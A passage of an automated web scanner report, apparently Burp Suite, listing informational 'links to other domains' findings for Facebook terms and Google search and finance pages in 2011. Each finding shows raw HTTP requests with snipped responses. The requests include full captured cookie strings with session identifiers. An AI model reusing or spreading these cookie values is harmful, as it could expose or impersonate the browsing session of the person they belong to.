<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/VI44PqgS-Cz.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://b.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://b.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

17.253. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/terms.php?ref=pf

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
http://e.static.ak.fbcdn.net/rsrc.php/yq/r/bEQSDvXrQUO.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css
http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

17.254. http://www.google.com/advanced_search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/advanced_search?q=millenium+boston&hl=en&prmd=ivnscm

The response contains the following link to another domain:

http://www.youtube.com/?q=millenium+boston&hl=en&tab=w1

Request

GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscm HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
</div><a href="http://www.youtube.com/?q=millenium+boston&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.255. http://www.google.com/coop/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/coop/profile

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/coop/profile?user=008953801846429853964&preview_query=example.com

The response contains the following links to other domains:

http://gmodules.com/ig/ifr?url=http://hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml&synd=3po&up_q=example.com
http://www.robtex.com/
http://www.robtex.com/dns/example.com.html

Request

GET /coop/profile?user=008953801846429853964&preview_query=example.com HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:20:41 GMT
Expires: Thu, 03 Feb 2011 04:20:41 GMT
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: pfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html [ PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" ]>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset
...[SNIP]...
<div class="profile-heading-url">
<a rel="nofollow" href="http://www.robtex.com/" itemprop="url">http://www.robtex.com/</a>
...[SNIP]...
<span style="font-size:medium">
<a rel="nofollow" href="http://www.robtex.com/dns/example.com.html" itemprop="url"><b>
...[SNIP]...
<td valign="top">
<iframe width="600" height="240" style="border:1px solid #999" src="http://gmodules.com/ig/ifr?url=http://hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml&synd=3po&up_q=example.com"></iframe>
...[SNIP]...
<span style="font-size:medium">
<a rel="nofollow" href="http://www.robtex.com/dns/example.com.html" itemprop="url"><b>
...[SNIP]...
<td valign="top">
<iframe width="600" height="240" style="border:1px solid #999" src="http://gmodules.com/ig/ifr?url=http://hosting.gmodules.com/ig/gadgets/file/112976434836923773614/rtq.xml&synd=3po&up_q=example.com"></iframe>
...[SNIP]...

17.256. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we

The response contains the following links to other domains:

http://annualreports.com/partners/Report/21590
http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-fslr-slw-mtw-lulu.html
http://finance.yahoo.com/q/rr?s=GES
http://google.brand.edgar-online.com/?sym=GES
http://googlefinanceblog.blogspot.com/
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec
http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES
http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES
http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5
http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES
http://www.dailyfinance.com/event/GES/usa
http://www.google.ca/finance
http://www.guess.com/worldofguess/
http://www.guess.eu/
http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst
http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-31-2011.html
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 03 Feb 2011 04:41:04 GMT
Expires: Thu, 03 Feb 2011 04:41:04 GMT
Cache-Control: private, max-age=0
Set-Cookie: SC=RV=659099:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Guess?, Inc.: NYSE:GES quotes & news - Google Finance</title>
<meta name="Description" c
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div>Q3 2011 Earnings Conference Call -
<a onclick="_GF_click('', 'webcast', 'GES', '')" href="http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES" class=time>
<img alt="Webcast" src="/finance/s/m4C5KaofCbA/images/cleardot.gif"
width=19 height=16 class=SP_webcast id=webcast>
...[SNIP]...
<td>
<a href="http://www.dailyfinance.com/event/GES/usa" >
More events from DailyFinance »</a>
...[SNIP]...
<br>
<a id=fs-chome href="http://www.guess.eu/" >
http://www.guess.eu/
</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0" >News Releases</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome" >Investor Relations</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec" >Financial Information</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard" >Executives</a>
...[SNIP]...
<div class=item><a id=fs- href="http://www.guess.com/worldofguess/" >Products/Services</a>
...[SNIP]...
<div class=item><a id=m-analyst
href=http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst >Analyst Estimates</a>
...[SNIP]...
<div class=item><a id=m-sec
href=http://google.brand.edgar-online.com?sym=GES >SEC Filings</a>
...[SNIP]...
<div class=item><a id=m-hold
href=http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES >Major Holders</a>
...[SNIP]...
<div class=item><a id=m-research
href=http://finance.yahoo.com/q/rr?s=GES >Research Reports</a>
...[SNIP]...
<div class=item><a id=m-annualreport
href=http://annualreports.com/partners/Report/21590 >Annual Report (PDF)</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-fslr-slw-mtw-lulu.html" rel="nofollow" >Stock Market Analysis: Mid Cap Stocks ( FSLR, SLW, MTW, LULU )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-31-2011.html" rel="nofollow" >Top Large Cap Stocks with Highest Upside Potential (Jan 31, 2011 ...</a>
...[SNIP]...
<div class=sfe-break-top>
<a id=m-rprofile href="http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES" >
More from Reuters »
</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892" >Bio & Compensation</a>
...[SNIP]...
<div class=gb>
<a href="http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5" >
Full list on Reuters »</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

17.257. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we

The response contains the following links to other domains:

http://annualreports.com/partners/Report/21590
http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-fslr-slw-mtw-lulu.html
http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-slw-mtw-adm-lulu.html
http://finance.yahoo.com/q/rr?s=GES
http://google.brand.edgar-online.com/?sym=GES
http://googlefinanceblog.blogspot.com/
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec
http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES
http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES
http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5
http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES
http://www.dailyfinance.com/event/GES/usa
http://www.google.ca/finance
http://www.guess.com/worldofguess/
http://www.guess.eu/
http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst
http://www.nasd100.com/2011/02/top-large-cap-stocks-with-highest-upside-potential-feb-1-2011.html
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 02 Feb 2011 15:53:08 GMT
Expires: Wed, 02 Feb 2011 15:53:08 GMT
Cache-Control: private, max-age=0
Set-Cookie: SC=RV=659099:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Guess?, Inc.: NYSE:GES quotes & news - Google Finance</title>
<meta name="Description" c
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div>Q3 2011 Earnings Conference Call -
<a onclick="_GF_click('', 'webcast', 'GES', '')" href="http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES" class=time>
<img alt="Webcast" src="/finance/s/m4C5KaofCbA/images/cleardot.gif"
width=19 height=16 class=SP_webcast id=webcast>
...[SNIP]...
<td>
<a href="http://www.dailyfinance.com/event/GES/usa" >
More events from DailyFinance »</a>
...[SNIP]...
<br>
<a id=fs-chome href="http://www.guess.eu/" >
http://www.guess.eu/
</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0" >News Releases</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome" >Investor Relations</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec" >Financial Information</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard" >Executives</a>
...[SNIP]...
<div class=item><a id=fs- href="http://www.guess.com/worldofguess/" >Products/Services</a>
...[SNIP]...
<div class=item><a id=m-analyst
href=http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst >Analyst Estimates</a>
...[SNIP]...
<div class=item><a id=m-sec
href=http://google.brand.edgar-online.com?sym=GES >SEC Filings</a>
...[SNIP]...
<div class=item><a id=m-hold
href=http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES >Major Holders</a>
...[SNIP]...
<div class=item><a id=m-research
href=http://finance.yahoo.com/q/rr?s=GES >Research Reports</a>
...[SNIP]...
<div class=item><a id=m-annualreport
href=http://annualreports.com/partners/Report/21590 >Annual Report (PDF)</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-fslr-slw-mtw-lulu.html" rel="nofollow" >Stock Market Analysis: Mid Cap Stocks ( FSLR, SLW, MTW, LULU )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-slw-mtw-adm-lulu.html" rel="nofollow" >Stock Market Analysis: Mid Cap Stocks ( SLW, MTW, ADM, LULU )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://www.nasd100.com/2011/02/top-large-cap-stocks-with-highest-upside-potential-feb-1-2011.html" rel="nofollow" >Top Large Cap Stocks with Highest Upside Potential (Feb 1, 2011 ...</a>
...[SNIP]...
<div class=sfe-break-top>
<a id=m-rprofile href="http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES" >
More from Reuters »
</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892" >Bio & Compensation</a>
...[SNIP]...
<div class=gb>
<a href="http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5" >
Full list on Reuters »</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

17.258. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl\x3den\x26tab\x3dwe\x22

The response contains the following links to other domains:

http://googlefinanceblog.blogspot.com/
http://www.abc.net.au/news/stories/2011/02/03/3129082.htm
http://www.businessweek.com/ap/financialnews/D9L4OMQ00.htm
http://www.businessweek.com/news/2011-02-02/mubarak-followers-battle-egyptian-protesters-in-cairo.html
http://www.chicagotribune.com/business/ct-biz-0203-hospira-earnings-20110203,0,5818880.story
http://www.google.ca/finance
http://www.jpost.com/MiddleEast/Article.aspx?id=206487
http://www.latimes.com/business/la-fi-mozilo-settlement-20110203,0,1090081.story
http://www.nytimes.com/2011/02/03/business/media/03news.html?src=busln
http://www.smh.com.au/world/journalists-attacked-by-mubarak-supporters-20110203-1aez9.html
http://www.usatoday.com/money/companies/earnings/2011-02-03-chinaearnings03_ST_N.htm
http://www.voanews.com/english/news/Gunfire-Erupts-in-Central-Cairo-115157494.html
http://www.youtube.com/?hl=en&tab=e1

Request

GET /finance?hl\x3den\x26tab\x3dwe\x22 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: S=sorry=6N0zPerLQtaqcOPwyzNvWg; __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; GZ=Z=0; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 04:41:16 GMT
Expires: Thu, 03 Feb 2011 04:41:16 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span class=name>
<a href="http://www.voanews.com/english/news/Gunfire-Erupts-in-Central-Cairo-115157494.html" rel=nofollow id=n-hp- >Gunfire Erupts in Central Cairo</a>
...[SNIP]...
<div class=rel-article>
<a href="http://www.jpost.com/MiddleEast/Article.aspx?id=206487" rel=nofollow id=n-hp- >Cairo: At least 3 anti-gov't demonstrators shot dead</a>
...[SNIP]...
<div class=rel-article>
<a href="http://www.abc.net.au/news/stories/2011/02/03/3129082.htm" rel=nofollow id=n-hp- >More killed in fresh Cairo clashes</a>
...[SNIP]...
<span class=byline>
<a href="http://www.businessweek.com/news/2011-02-02/mubarak-followers-battle-egyptian-protesters-in-cairo.html" rel=nofollow class=rel id=n-hp- >BusinessWeek</a>  
<a href="http://www.smh.com.au/world/journalists-attacked-by-mubarak-supporters-20110203-1aez9.html" rel=nofollow class=rel id=n-hp- >Sydney Morning Herald</a>
...[SNIP]...
<div>
<a class=title href="http://www.businessweek.com/ap/financialnews/D9L4OMQ00.htm" rel=nofollow id=n-hp- >Stocks flat day after Dow tops 12000</a>
...[SNIP]...
<div>
<a class=title href="http://www.nytimes.com/2011/02/03/business/media/03news.html?src=busln" rel=nofollow id=n-hp- >News Corp.'s Net Income More Than Doubles, Led by Its Cable Networks</a>
...[SNIP]...
<div>
<a class=title href="http://www.usatoday.com/money/companies/earnings/2011-02-03-chinaearnings03_ST_N.htm" rel=nofollow id=n-hp- >For some US companies, China sales rule</a>
...[SNIP]...
<div>
